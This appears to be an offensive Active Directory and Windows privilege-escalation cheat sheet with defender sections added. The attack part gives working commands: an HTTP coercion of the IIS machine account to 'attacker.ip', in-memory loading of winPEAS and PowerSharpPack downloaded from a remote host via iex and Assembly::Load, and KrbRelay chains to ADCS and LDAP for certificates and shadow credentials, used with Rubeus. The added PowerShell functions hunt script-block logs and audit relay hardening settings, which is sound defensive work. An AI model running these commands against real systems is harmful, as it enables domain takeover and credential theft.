PrivEsc

Did you know you don't need a Potato exploit to go from an IIS AppPool account to admin or SYSTEM? Simply use:

powershell iwr http://attacker.ip -UseDefaultCredentials 

This coerces the machine account into authenticating over HTTP to the attacker host. https://twitter.com/M4yFly/status/1745581076846690811?t=lntNso51gwxHZFPXGnSKpg&s=08

AMSI Bypass

winPEAS in Memory

# Download the binary into memory and load it as a .NET assembly (nothing touches disk)
$data=(New-Object System.Net.WebClient).DownloadData('http://10.10.10.200:8000/winPEASany_ofs.exe');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
# Swap Console.Out for a StringWriter so the tool's output comes back as one string, then restore it
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);
[winPEAS.Program]::Main("");[Console]::SetOut($out);$sWriter.ToString()

PowerSharpPack

iex(new-object net.webclient).downloadstring('http://10.10.10.200:8000/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -winPEAS
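
Defender side, added here and not part of the original notes or of the winPEAS/PowerSharpPack projects: both loaders above (DownloadData into Assembly::Load, and downloadstring piped into iex) leave their full text in PowerShell Script Block Logging (event ID 4104) when it is enabled. This function pulls recent 4104 events from the Operational log and flags the ones matching those patterns. The indicator regexes and the function name are this example's own assumptions, not a vendor rule.

```powershell
# Added example, not from the original page: hunt Script Block Logging (event 4104)
# for the in-memory loader patterns used above. Needs Script Block Logging enabled
# and rights to read the Microsoft-Windows-PowerShell/Operational log.
function Find-InMemoryLoader {
    param(
        [int]$MaxEvents = 5000,
        [datetime]$Since = (Get-Date).AddDays(-1)
    )

    # Indicators taken from the commands in this section. These regexes are this
    # example's own assumption about how such loaders look, not a complete list.
    $indicators = @(
        '\[System\.Reflection\.Assembly\]::Load\(',
        '\.DownloadData\(',
        '\.DownloadString\(',
        '\[Console\]::SetOut\(',
        'PowerSharpPack'
    )

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        # For 4104, Properties[2] is ScriptBlockText and Properties[4] is the
        # script path (empty when the block was typed or piped to iex).
        $text = [string]$evt.Properties[2].Value
        $hits = @($indicators | Where-Object { $text -match $_ })   # -match is case-insensitive
        if ($hits.Count -eq 0) { continue }

        $flat = $text -replace '\s+', ' '
        [pscustomobject]@{
            TimeCreated = $evt.TimeCreated
            ProcessId   = $evt.ProcessId
            Path        = $evt.Properties[4].Value
            Indicators  = ($hits -join ', ')
            Snippet     = $flat.Substring(0, [Math]::Min(160, $flat.Length))
        }
    }
}

# Usage: Find-InMemoryLoader | Format-Table -AutoSize
```

An empty Path together with a DownloadData/Load hit is the interesting combination: the code never existed as a file, which is exactly what the in-memory trick is for.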

KrbRelay

  • RBCD (by @an0n_r0)

  • Relay to ADCS with web enrollment to request a certificate of template Machine (by @t0-n1)

    # braavos is the server hosting the ADCS
    .\CheckPort.exe
    $krbrelay = .\KrbRelay.exe -spn http/braavos.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -endpoint certsrv -adcs 'Machine'
    $certificate = $krbrelay[-1]
    echo $certificate
    # The base64 encoded output is usable with `Rubeus.exe`'s `/certificate:<base64>`
    Invoke-Rubeus "asktgt /user:BRAAVOS$ /certificate:$certificate /nowrap"
    
  • Shadowcred (by @icyguider)

    # meereen is the domain controller
    .\CheckPort.exe
    .\KrbRelay.exe -spn ldap/meereen.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred
    # follow the output to use Rubeus
    
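
Hardening check, added here and not part of the original notes or of KrbRelay: every chain on this page relies on a target accepting an authentication it did not originate, and each leg has a host-side setting that breaks it. The outgoing-NTLM restriction on the IIS host stops the app pool from answering the attacker's HTTP challenge with the machine account's NTLM; LDAP signing and channel binding on the DC are what the ldap/meereen relay (shadow credentials, RBCD) needs to be absent; Extended Protection set to Require on /certsrv is what the ADCS web-enrollment guidance asks for. The registry value names and meanings are the documented Microsoft ones; the IIS site path, the function name and the verdict logic are this example's own assumptions.

```powershell
# Added example, not from the original page: audit the settings that break the
# coercion-and-relay chains above. Run as admin on the relevant box: the NTLM check
# matters on the IIS host, the LDAP checks on a DC, the EPA check on the ADCS
# web-enrollment server. Each result says which host it is meaningful on.
function Get-RelayHardening {
    $lsa  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'

    # Read a registry DWORD; $null when the value is absent (absent means the
    # default, which for every value below is the non-hardened state).
    function Get-Dword([string]$Path, [string]$Name) {
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
    }

    # Outgoing NTLM: 0 = allow all, 1 = audit all, 2 = deny all.
    $ntlm = Get-Dword $lsa 'RestrictSendingNTLMTraffic'
    [pscustomobject]@{
        Check    = 'Outgoing NTLM denied (RestrictSendingNTLMTraffic)'
        Value    = $ntlm
        Hardened = ($ntlm -eq 2)
        Note     = 'Applies on the IIS host; 1 only audits'
    }

    # LDAP signing: 2 = require signing. Unsigned LDAP is what a relay to
    # ldap/<dc> needs in order to write to the computer object.
    $sign = Get-Dword $ntds 'LDAPServerIntegrity'
    [pscustomobject]@{
        Check    = 'LDAP signing required (LDAPServerIntegrity)'
        Value    = $sign
        Hardened = ($sign -eq 2)
        Note     = 'Only meaningful on a domain controller'
    }

    # LDAPS channel binding: 0 = never, 1 = when supported, 2 = always.
    $cb = Get-Dword $ntds 'LdapEnforceChannelBinding'
    [pscustomobject]@{
        Check    = 'LDAPS channel binding enforced (LdapEnforceChannelBinding)'
        Value    = $cb
        Hardened = ($cb -eq 2)
        Note     = 'Only meaningful on a domain controller'
    }

    # ADCS web enrollment: extendedProtection tokenChecking = Require (together
    # with HTTPS only) on /certsrv. The site path below is an assumption.
    $epa = $null
    try {
        Import-Module WebAdministration -ErrorAction Stop
        $epa = Get-WebConfigurationProperty -PSPath 'IIS:\Sites\Default Web Site\certsrv' `
            -Filter 'system.webServer/security/authentication/windowsAuthentication/extendedProtection' `
            -Name tokenChecking -ErrorAction Stop
        # Some IIS provider versions hand back a ConfigurationAttribute rather than the bare string.
        if ($epa.PSObject.Properties['Value']) { $epa = $epa.Value }
    } catch { $epa = 'n/a (no IIS or no certsrv vdir on this host)' }
    [pscustomobject]@{
        Check    = 'ADCS web enrollment EPA (extendedProtection tokenChecking)'
        Value    = $epa
        Hardened = ("$epa" -eq 'Require')
        Note     = 'Only meaningful on the ADCS web-enrollment server'
    }
}

# Usage: Get-RelayHardening | Format-Table -AutoSize
```

Anything with Hardened = False on the host it applies to is a leg of the chain above that is still open; a value of $null means the policy was never set, which is the default and not a safe reading.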

Further Reading